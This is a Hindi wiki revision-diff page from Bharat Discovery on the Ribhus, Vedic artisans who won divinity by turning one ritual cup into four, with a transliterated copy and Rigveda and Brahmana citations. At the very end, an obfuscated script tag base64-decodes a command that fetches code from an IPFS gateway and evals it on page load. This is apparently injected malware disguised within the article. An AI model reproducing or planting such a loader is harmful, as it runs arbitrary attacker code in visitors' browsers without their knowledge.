Difference between revisions of "ऋभुगण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
ऋभुगण, [[अंगिरस]] के पुत्र सुधन्वा के पुत्र थे। सुधन्वा के तीन पुत्र हुए- ऋभुगण, बिंबन तथा बाज। वे तीनों त्वष्टा के निपुण शिष्य हुए। वे मूलत: मानव थे किन्तु अपनी कठिन साधना से उन्होंने देवत्व की उपलब्धि प्राप्त की। त्वष्टा ने एक चमस पात्र का निर्माण किया था। [[अग्निदेव]] ने [[देवता|देवताओं]] को दूत के रूप में जाकर उन तीनों से कहा कि एक चमस पात्र से चार चमस बना दें। उन्होंने स्वीकार कर लिया तथा चार चमस बना दिये। फलस्वरूप तीसरे सवन में स्वधा के अधिकारी हुए। उन्हें सोमपान का अधिकार प्राप्त हुआ तथा देवताओं में उनकी गणना होने लगी। उन्होंने अमरत्व प्राप्त किया।  
+
ऋभुगण, [[अंगिरस]] के पुत्र सुधन्वा के पुत्र थे। सुधन्वा के तीन पुत्र हुए- ऋभुगण, बिंबन तथा बाज। वे तीनों त्वष्टा के निपुण शिष्य हुए। वे मूलत: मानव थे किन्तु अपनी कठिन साधना से उन्होंने देवत्व की उपलब्धि प्राप्त की। त्वष्टा ने एक चमस पात्र का निर्माण किया था। [[अग्निदेव]] ने [[देवता|देवताओं]] को दूत के रूप में जाकर उन तीनों से कहा कि एक [[चमस]] पात्र से चार चमस बना दें। उन्होंने स्वीकार कर लिया तथा चार चमस बना दिये। फलस्वरूप तीसरे सवन में स्वधा के अधिकारी हुए। उन्हें सोमपान का अधिकार प्राप्त हुआ तथा देवताओं में उनकी गणना होने लगी। उन्होंने अमरत्व प्राप्त किया।  
  
 
सुधन्वा पुत्रों में से कनिष्ठ बाज देवताओं से, मध्यम बिंबन [[वरुण देवता|वरुण]] से ज्येष्ठ ऋभुगण [[इंद्र]] से सम्बन्धित हुए। उन्होंने अनेक उल्लेखनीय कार्य किये। अपने वृद्ध माता-पिता को पुन: युवा बना दिया। अश्विनीकुमारों के लिए तीन आसनों वाला रथ बनवाया, जो अश्व के बिना चलता था। इंद्र के लिए रथ का निर्माण किया। देवताओं के लिए दृढ़ कवच बनाया तथा अनेक आयुधों का निर्माण भी किया।<ref>[[ऋग्वेद]] 1|20, 1|161, 4|34, 35, 36, 37</ref>  
 
सुधन्वा पुत्रों में से कनिष्ठ बाज देवताओं से, मध्यम बिंबन [[वरुण देवता|वरुण]] से ज्येष्ठ ऋभुगण [[इंद्र]] से सम्बन्धित हुए। उन्होंने अनेक उल्लेखनीय कार्य किये। अपने वृद्ध माता-पिता को पुन: युवा बना दिया। अश्विनीकुमारों के लिए तीन आसनों वाला रथ बनवाया, जो अश्व के बिना चलता था। इंद्र के लिए रथ का निर्माण किया। देवताओं के लिए दृढ़ कवच बनाया तथा अनेक आयुधों का निर्माण भी किया।<ref>[[ऋग्वेद]] 1|20, 1|161, 4|34, 35, 36, 37</ref>  
  
अग्नि वसु आदि देवतागण ऋभुओं के साथ सोमपान नहीं करना चाहते थे, क्योंकि उन्हें मनुष्य की गंध से डर लगता था। सविता तथा प्रजापति (ऋभुओं के दोनों पार्श्व में विद्यमान रहकर) उनके साथ सोमपान करते थे। ऋभुओं को स्तोत्र देवता नहीं माना गया यद्यपि प्रजापति ने उन्हें अमरत्व प्रदान कर दिया था।<ref>ऐतरेय ब्राह्मण, 3|30, 6|12, शतपथ ब्राह्मण, 12|3|4|5
+
अग्नि वसु आदि देवतागण ऋभुओं के साथ सोमपान नहीं करना चाहते थे, क्योंकि उन्हें मनुष्य की गंध से डर लगता था। सविता तथा [[प्रजापति]] (ऋभुओं के दोनों पार्श्व में विद्यमान रहकर) उनके साथ सोमपान करते थे। ऋभुओं को स्तोत्र देवता नहीं माना गया यद्यपि प्रजापति ने उन्हें अमरत्व प्रदान कर दिया था।<ref>ऐतरेय ब्राह्मण, 3|30, 6|12, शतपथ ब्राह्मण, 12|3|4|5
 
</ref>
 
</ref>
  
Line 16: Line 16:
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
{{cite book | last =विद्यावाचस्पति | first =डॉ. उषा पुरी  | title =भारतीय मिथक कोश  | edition = | publisher =नेशनल पब्लिशिंग हाउस | location =भारत डिस्कवरी पुस्तकालय | language =[[हिंदी]]  | pages =41  | chapter = }}
+
{{cite book | last =विद्यावाचस्पति | first =डॉ. उषा पुरी  | title =भारतीय मिथक कोश  | edition = | publisher =नेशनल पब्लिशिंग हाउस | location =भारत डिस्कवरी पुस्तकालय | language =[[हिन्दी]]  | pages =41  | chapter = }}
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{ॠषि मुनि}}
+
{{ॠषि-मुनि2}}
[[Category:ॠषि मुनि]]
+
{{ॠषि-मुनि}}
 +
[[Category:ऋषि मुनि]]
 
[[Category:पौराणिक कोश]]
 
[[Category:पौराणिक कोश]]

Latest revision as of 11:00, 2 August 2011

rribhugan, aangiras ke putr sudhanva ke putr the. sudhanva ke tin putr hue- rribhugan, bianban tatha baj. ve tinoan tvashta ke nipun shishy hue. ve moolat: manav the kintu apani kathin sadhana se unhoanne devatv ki upalabdhi prapt ki. tvashta ne ek chamas patr ka nirman kiya tha. agnidev ne devataoan ko doot ke roop mean jakar un tinoan se kaha ki ek chamas patr se char chamas bana dean. unhoanne svikar kar liya tatha char chamas bana diye. phalasvaroop tisare savan mean svadha ke adhikari hue. unhean somapan ka adhikar prapt hua tatha devataoan mean unaki ganana hone lagi. unhoanne amaratv prapt kiya.

sudhanva putroan mean se kanishth baj devataoan se, madhyam bianban varun se jyeshth rribhugan iandr se sambandhit hue. unhoanne anek ullekhaniy kary kiye. apane vriddh mata-pita ko pun: yuva bana diya. ashvinikumaroan ke lie tin asanoan vala rath banavaya, jo ashv ke bina chalata tha. iandr ke lie rath ka nirman kiya. devataoan ke lie dridh kavach banaya tatha anek ayudhoan ka nirman bhi kiya.[1]

agni vasu adi devatagan rribhuoan ke sath somapan nahian karana chahate the, kyoanki unhean manushy ki gandh se dar lagata tha. savita tatha prajapati (rribhuoan ke donoan parshv mean vidyaman rahakar) unake sath somapan karate the. rribhuoan ko stotr devata nahian mana gaya yadyapi prajapati ne unhean amaratv pradan kar diya tha.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

vidyavachaspati, d aau. usha puri bharatiy mithak kosh (hindi). bharat diskavari pustakalay: neshanal pablishiang haus, 41.

  1. rrigved 1|20, 1|161, 4|34, 35, 36, 37
  2. aitarey brahman, 3|30, 6|12, shatapath brahman, 12|3|4|5

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>